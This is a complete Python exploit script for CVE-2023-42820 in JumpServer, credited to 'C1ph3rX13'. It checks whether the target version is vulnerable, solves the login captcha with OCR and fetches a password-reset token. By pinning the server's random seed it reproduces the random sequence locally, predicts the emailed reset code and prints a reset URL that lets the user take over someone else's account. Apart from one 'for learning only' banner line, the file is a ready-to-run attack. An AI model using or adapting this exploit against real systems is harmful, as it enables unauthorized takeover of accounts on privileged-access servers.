# -*- coding: utf-8 -*- import io import re from distutils.version import LooseVersion import colorlog import httpx import logging import sys import random import string import argparse from urllib.parse import urljoin, urlparse, parse_qs import ddddocr from PIL import Image from bs4 import BeautifulSoup headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', } # 定义特殊符号 string_punctuation = '!#$%&()*+,-.:;<=>?@[]^_~' # 代理设置 PROXIES = {} def banner(): print(''' ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██████╗ ██████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗╚════██╗██╔═████╗ ██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝ █████╔╝██║██╔██║ ██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗██╔═══╝ ████╔╝██║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝███████╗╚██████╔╝ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚══════╝ ╚═════╝ @Auth: C1ph3rX13 @Blog: https://c1ph3rx13.github.io @Note: 代码仅供学习使用,请勿用于其他用途 ''') def setup_color_logging(): # 创建一个 colorlog 的日志记录器 logger = colorlog.getLogger() logger.setLevel(logging.INFO) # 创建控制台处理器并设置格式 console_handler = logging.StreamHandler(sys.stdout) console_formatter = colorlog.ColoredFormatter( '%(asctime)s - %(log_color)s%(levelname)s - %(message)s', datefmt='%Y-%m-%d %H:%M:%S', reset=True, log_colors={ 'DEBUG': 'cyan', 'INFO': 'green', 'WARNING': 'yellow', 'ERROR': 'red', 'CRITICAL': 'bold_red', } ) console_handler.setFormatter(console_formatter) # 将处理器添加到日志记录器 logger.addHandler(console_handler) return logger # 日志记录器对象 logger = setup_color_logging() # 根据 JumpServer 的代码实现的重置验证码解密 def random_string(length: int, lower=True, upper=True, digit=True, special_char=False): args_names = ['lower', 'upper', 'digit', 'special_char'] args_values = [lower, upper, digit, special_char] args_string = [string.ascii_lowercase, string.ascii_uppercase, string.digits, string_punctuation] args_string_map = dict(zip(args_names, args_string)) kwargs = dict(zip(args_names, args_values)) kwargs_keys = list(kwargs.keys()) kwargs_values = list(kwargs.values()) args_true_count = len([i for i in kwargs_values if i]) assert any(kwargs_values), f'Parameters {kwargs_keys} must have at least one `True`' assert length >= args_true_count, f'Expected length >= {args_true_count}, bug got {length}' can_startswith_special_char = args_true_count == 1 and special_char chars = ''.join([args_string_map[k] for k, v in kwargs.items() if v]) while True: password = list(random.choice(chars) for i in range(length)) for k, v in kwargs.items(): if v and not (set(password) & set(args_string_map[k])): # 没有包含指定的字符, retry break else: if not can_startswith_special_char and password[0] in args_string_map['special_char']: # 首位不能为特殊字符, retry continue else: # 满足要求终止 while 循环 break password = ''.join(password) return password def nop_random(seed: str): random.seed(seed) for i in range(4): random.randrange(-35, 35) for p in range(int(180 * 38 * 0.1)): random.randint(0, 180) random.randint(0, 38) # 循环访问 seed 污染 worker 来达到固定 seed def fix_seed(target: str, seed: str): def _request(i: int, u: str): logging.info('Send %d Request to %s', i, u) response = httpx.get(url=u, headers=headers, timeout=5, verify=False, proxies=PROXIES) assert response.status_code == httpx.codes.OK assert response.headers['Content-Type'] == 'image/png' url = urljoin(target, '/core/auth/captcha/image/' + seed + '/') for idx in range(10): _request(idx, url) def get_seed(target: str): url = urljoin(target, "/core/auth/password/forget/previewing/") # url = urljoin(target, "/core/auth/password/forgot/") response = httpx.get(url=url, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES) if response.status_code == httpx.codes.OK: # 匹配 seed html_text = response.text soup = BeautifulSoup(html_text, "lxml") captcha_src = soup.select_one('.captcha').get('src') seed = captcha_src.split('/')[-2] logging.critical("Get Seed: %r", seed) return seed else: return False def ocr_captcha(target: str, max_attempts=5): attempts = 0 while attempts < max_attempts: try: # 获取验证码图片 seed = get_seed(target) if seed is None: logging.error("Failed to Get Captcha Seed") return None image_url = urljoin(target, 'core/auth/captcha/image/' + seed + '/') response = httpx.get(url=image_url, headers=headers, verify=False, proxies=PROXIES) response.raise_for_status() img_bytes = io.BytesIO(response.content) # 图片识别 res_code = recognize_captcha(img_bytes) # 计算验证码结果 result = calculate_captcha_result(res_code) if result is not None: logging.critical("Captcha Result: %r", result) return str(result), seed except (httpx.HTTPError, httpx.RequestError) as e: logging.error("Failed to Fetch Captcha Image: %s", str(e)) attempts += 1 return None def recognize_captcha(img_bytes): ocr = ddddocr.DdddOcr() img = Image.open(img_bytes).convert('L') img = img.resize((int(img.size[0] * (64 / img.size[1])), 64), Image.ANTIALIAS) img_bytes = io.BytesIO() img.save(img_bytes, format='PNG') img_bytes = img_bytes.getvalue() res_code = ocr.classification(img_bytes) logging.warning("Captcha Image Result: %s", res_code) return res_code def calculate_captcha_result(res_code): if len(res_code) < 3 or res_code[1] not in ['+', '-', '*', '/', 'x'] or '10' in res_code or 'o' in res_code: logging.warning("Failed to Convert Operands to Integers") return None operator = re.findall(r"[+\-*/x]", res_code)[0] operands = re.findall(r"\d+", res_code) if len(operands) != 2: logging.warning("Failed to Convert Operands to Integers") return None try: a, b = map(int, operands) if operator == ["+", "x"]: result = a + b elif operator == "-": result = a - b elif operator in "*": result = a * b elif operator == "/": result = a / b else: logging.error("Invalid Operator: %s", operator) return None return result except (ValueError, ZeroDivisionError) as e: logging.warning("Failed to Calculate Captcha Result: %s", str(e)) return None def get_token(target: str, username: str): url = urljoin(target, "/core/auth/password/forget/previewing/") # 获取 csrf_token with httpx.Client(headers=headers, follow_redirects=True, verify=False, proxies=PROXIES) as client: token_resp = client.get(url=url) assert token_resp.status_code == httpx.codes.OK # 匹配参数 html_text = token_resp.text soup = BeautifulSoup(html_text, "lxml") # 匹配 csrf_token csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'}).get('value') logging.critical("Get Csrf_Token: %s", csrf_token) # 匹配 token_seed, 计算验证码结果 token_captcha, token_seed = ocr_captcha(target) # 发起表单 POST 请求 csrf_cookies = token_resp.cookies data = { 'csrfmiddlewaretoken': csrf_token, 'username': username, 'captcha_0': token_seed, 'captcha_1': token_captcha, } response = client.post(url=url, data=data, cookies=csrf_cookies) assert response.status_code == httpx.codes.OK # 匹配 token parsed_url = urlparse(str(response.url)) query_dict = parse_qs(parsed_url.query) reset_token = query_dict.get('token', [''])[0] logging.critical("Get Token: %s", reset_token) return str(reset_token) def send_code(target: str, email: str, reset_token: str): url = urljoin(target, "/api/v1/authentication/password/reset-code/?token=" + reset_token) response = httpx.post(url=url, json={ 'email': email, 'sms': '', 'form_type': 'email', }, headers=headers, follow_redirects=False, verify=False, proxies=PROXIES) if response.status_code == httpx.codes.OK: logging.info("Send Code Headers: %r Response: %r", response.headers, response.text) return True else: return False def check_version(target: str): if get_seed(target): # 发送 GET 请求获取页面内容 with httpx.Client(headers=headers, verify=False, follow_redirects=True, proxies=PROXIES) as client: response = client.get(url=target) page_content = response.text # 类似 src=/ui/assets/js/ match = re.search(r'src=/ui/assets/js/(?P[a-zA-Z0-9.]+)>', page_content) if match: js_file = match.group('jsFile') logger.critical("Found JSFile: %s", js_file) else: logger.critical("Not Found") exit() js_url = f"{target}/ui/assets/js/{js_file}" js_response = client.get(url=js_url) js_content = js_response.text # 匹配版本号 pattern1 = r'value:"v(\d+\.\d+\.\d+)"' pattern2 = r'version:"(\d+\.\d+\.\d+)"' match1 = re.search(pattern1, js_content) if match1: version = match1.group(1) logger.critical("Found Version: %s", version) else: match2 = re.search(pattern2, js_content) if match2: version = match2.group(1) logger.critical("Found Version: %s", version) else: logger.critical("Not Found") # 判断漏洞版本 if LooseVersion(version) <= LooseVersion('2.28.20') or LooseVersion(version) <= LooseVersion('3.7.1'): logger.critical("Vulnerable") return True else: return False def main(target: str, email: str, username: str): if check_version(target): # 获取 seed seed = get_seed(target) # 获取token reset_token = get_token(target, username) # POST fix_seed(target, seed) nop_random(seed) if send_code(target, email, reset_token): code = random_string(6, lower=False, upper=False) logging.critical("Your Code is %s", code) reset_url = urljoin(target, '/core/auth/password/forgot/?token=' + reset_token) logger.critical('Reset Url: %s', reset_url) else: logging.critical("Send Code Fail") else: logger.critical("Not Vulnerable") if __name__ == '__main__': banner() parser = argparse.ArgumentParser(description='CVE-2023-42820 by C1ph3rX13.') parser.add_argument('-t', '--target', type=str, required=True, help='target url') parser.add_argument('-e', '--email', type=str, required=True, help='account email') parser.add_argument('-u', '--username', type=str, required=True, help='account username') parser.add_argument("--proxy", type=str, required=False, help="proxy to http://ip:port") args = parser.parse_args() if args.proxy: PROXIES = {'all://': f'{args.proxy}'} main(args.target, args.email, args.username)